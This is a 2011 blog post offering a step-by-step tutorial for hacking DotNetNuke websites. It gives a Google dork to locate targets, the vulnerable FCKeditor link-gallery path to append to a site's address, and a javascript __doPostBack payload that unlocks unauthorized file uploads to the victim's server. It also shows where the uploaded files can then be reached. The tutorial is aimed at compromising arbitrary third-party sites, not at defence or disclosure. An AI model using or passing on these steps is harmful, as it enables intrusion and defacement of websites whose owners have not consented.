border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Sunday, May 29, 2011

DNN (DotNetNuke) Website Hacking – Tutorial



It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal website.
Below are the easy steps to implement the attack:
• First use a google dork to find the appropriate target.
inurl:”/portals/0? site:.com
• You can change com to your desired domain name like bd ph ae
• Now search your website on the google after searching you will get many websites choose any one of it.
• Its time to check the required vulnerability on the website just place this code after the web address.
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
• For example if you got www.victim.com
• Replace it www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
• If you will get this screen means this web is going to hack.
dnn1 300x279 DNN (DotNetNuke) Website Hacking   Tutorial
• Now choose the third option “A File On Your Site” And than paste this java code on your address bar.
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
• It will allow you to upload a files on this website you can upload text ~ swf ~ jpg ~ gif ~ pdf ~ Files.
• After uploading files you can find your file on this address www.victim.com/portals/0/yourfile.extension
here extension is txt jpg swf etc.
• In our case
www.victim.com/portals/0/b.txt

No comments:

Post a Comment

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More